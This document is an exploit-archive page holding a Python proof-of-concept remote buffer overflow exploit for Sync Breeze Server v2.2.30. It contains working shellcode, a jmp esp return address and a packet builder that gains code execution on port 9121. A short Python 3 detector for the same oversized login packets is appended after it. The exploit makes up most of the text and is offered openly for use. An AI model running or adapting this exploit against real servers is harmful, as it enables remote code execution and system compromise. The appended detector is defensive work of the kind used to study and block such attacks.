# Title : Sync Breeze Server v2.2.30 Remote Buffer Overflow Exploit
# Published : 2010-10-11
# Author : xsploited security
#!/usr/bin/python
# Exploit Title: Sync Breeze Server v2.2.30 Remote BOF Exploit
# Date: 10/10/2010
# Author: Xsploited Security [aka xsploitedsec]
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezesrv_setup_v2.2.30.exe
# Version: v2.2.30 (Others are most likely affected as well)
# Tested on: A Windows XP SP3 machine
# CVE : N/A
### Vulnerability Information: ###
# A vulnerability exists in the way Sync Breeze v2.2.30 processes login requests after accepting a connection from a remote client.
# If a packet longer than 484 bytes is received with the command prefix "ServerLogin.", the affected service (syncbrs.exe)
# crashes as the result of a buffer overflow. An attacker can easily leverage this vulnerability to control execution flow and
# execute arbitrary code.
###
# This PoC's usage:
# 1. Verify that the service is running on the remote machine; the default port is 9121.
# 2. Execute syncbreeze.py against the host.
# 3. Check the remote machine's process list for calc to verify successful command execution. (Running as SYSTEM, on my test machine at least..)
###
# Other notes:
# If the software is installed from an administrator account, shellcode will be executed at admin / (system) level. This could be a potential
# privilege escalation attack vector (although I have not verified this yet).
# I am sure a lot more can be done with this (fit more shellcode, universal, etc.). I'll leave that up to researchers, however.
# Have fun!
###
### Shouts:
# kAoTiX - Helping me verify this bug/exploit
# MAX - Keeps me entertained, makes me giggle
# CorelanCoder - Your tutorials are absolutely fking awesome
# exploit-db, offensive-sec, packetstormsecurity and all security teams and sites!
###
import sys, socket

if len(sys.argv) != 2:
    print "[!] Usage: ./syncbreeze.py <Target IP>"
    sys.exit(1)

about = "=================================================\n"
about += "Title: Sync Breeze Server v2.2.30 Remote BOF PoC\n"
about += "Author: xsploited security\nURL: http://www.x-sploited.com/\n"
about += "Contact: xsploitedsecurity [at] gmail.com\n"
about += "=================================================\n"
print about
host = sys.argv[1]
port = 9121 #default server port, unchangeable (I think)
# windows/exec - 218 bytes / http://www.metasploit.com
# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc
calc = ("\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97\x8c"
"\x8a\x10\x83\xeb\xfc\xe2\xf4\x6b\x64\x03\x10\x97\x8c\xea\x99"
"\x72\xbd\x58\x74\x1c\xde\xba\x9b\xc5\x80\x01\x42\x83\x07\xf8"
"\x38\x98\x3b\xc0\x36\xa6\x73\xbb\xd0\x3b\xb0\xeb\x6c\x95\xa0"
"\xaa\xd1\x58\x81\x8b\xd7\x75\x7c\xd8\x47\x1c\xde\x9a\x9b\xd5"
"\xb0\x8b\xc0\x1c\xcc\xf2\x95\x57\xf8\xc0\x11\x47\xdc\x01\x58"
"\x8f\x07\xd2\x30\x96\x5f\x69\x2c\xde\x07\xbe\x9b\x96\x5a\xbb"
"\xef\xa6\x4c\x26\xd1\x58\x81\x8b\xd7\xaf\x6c\xff\xe4\x94\xf1"
"\x72\x2b\xea\xa8\xff\xf2\xcf\x07\xd2\x34\x96\x5f\xec\x9b\x9b"
"\xc7\x01\x48\x8b\x8d\x59\x9b\x93\x07\x8b\xc0\x1e\xc8\xae\x34"
"\xcc\xd7\xeb\x49\xcd\xdd\x75\xf0\xcf\xd3\xd0\x9b\x85\x67\x0c"
"\x4d\xfd\x8d\x07\x95\x2e\x8c\x8a\x10\xc7\xe4\xbb\x9b\xf8\x0b"
"\x75\xc5\x2c\x72\x84\x22\x7d\xe4\x2c\x85\x2a\x11\x75\xc5\xab"
"\x8a\xf6\x1a\x17\x77\x6a\x65\x92\x37\xcd\x03\xe5\xe3\xe0\x10"
"\xc4\x73\x5f\x73\xf6\xe0\xe9\x10")
# Begin payload buffer:
packet_header = ("\x53\x65\x72\x76\x65\x72\x4C\x6F\x67\x69\x6E\x02")  # "ServerLogin" followed by 0x02
junk = "\x90" * 256  # 256-byte junk buffer to reach eip
eip = "\xFB\xF8\xAB\x71"  # jmp esp (via ws2_32.dll)
nops = "\x90" * 12  # small nop sled
# packet structure:
# [header][junk][eip][nops][shellcode][nops][nops]
packet = packet_header + junk + eip + nops + calc + nops + nops
print "[*] Connecting to " + host + "...\r"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Connected, Sending payload\r"
s.send(packet + "\r\n")
print "[*] Payload sent successfully"
print "[*] Check the results\r"
s.close()
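As an added defensive example (not part of the original PoC), the following Python 3 detector flags captured login packets that meet the crash condition given in the vulnerability information and mirrored by the packet layout above. The "ServerLogin" prefix, port 9121 and the 484-byte threshold come from the page; the eight-byte NOP-sled heuristic, the (src_ip, dst_port, payload) flow format and the sample traffic are constructed assumptions.

```python
SYNCBREEZE_PORT = 9121         # default service port (from the PoC)
LOGIN_PREFIX = b"ServerLogin"  # command prefix named in the advisory
MAX_SAFE_LEN = 484             # advisory: longer login packets crash syncbrs.exe
NOP_SLED_MIN = 8               # assumption: 8+ consecutive 0x90 bytes counts as a sled


def inspect_login_packet(payload: bytes) -> dict:
    """Classify one TCP payload; verdict is 'ignore', 'ok' or 'suspicious'."""
    result = {"is_login": payload.startswith(LOGIN_PREFIX), "length": len(payload),
              "oversized": False, "nop_sled": False, "verdict": "ignore"}
    if not result["is_login"]:
        return result                      # not a ServerLogin request
    # Primary check, straight from the advisory: login request longer than 484 bytes.
    result["oversized"] = len(payload) > MAX_SAFE_LEN
    # Secondary heuristic: a run of 0x90 padding like the PoC's junk/nop buffers.
    result["nop_sled"] = b"\x90" * NOP_SLED_MIN in payload
    result["verdict"] = "suspicious" if (result["oversized"] or result["nop_sled"]) else "ok"
    return result


def scan_flows(flows):
    """Return one alert string per suspicious login packet sent to tcp/9121.

    flows: iterable of (src_ip, dst_port, payload) tuples (constructed format).
    """
    alerts = []
    for src, dst_port, payload in flows:
        if dst_port != SYNCBREEZE_PORT:
            continue
        info = inspect_login_packet(payload)
        if info["verdict"] == "suspicious":
            reasons = ", ".join(k for k in ("oversized", "nop_sled") if info[k])
            alerts.append(f"{src} -> tcp/{dst_port}: ServerLogin {info['length']} bytes ({reasons})")
    return alerts


# Constructed sample traffic: a normal-sized login, an oversized one, and unrelated HTTP.
SAMPLE_FLOWS = [
    ("10.0.0.5", 9121, b"ServerLogin\x02alice\r\n"),
    ("10.0.0.9", 9121, b"ServerLogin\x02" + b"\x90" * 256 + b"A" * 240 + b"\r\n"),
    ("10.0.0.7", 80, b"GET / HTTP/1.0\r\n\r\n"),
]

if __name__ == "__main__":
    for alert in scan_flows(SAMPLE_FLOWS):
        print(alert)
```

Only the 510-byte login is reported; the 484-byte boundary itself is treated as safe, matching the advisory's "greater than 484 bytes" wording.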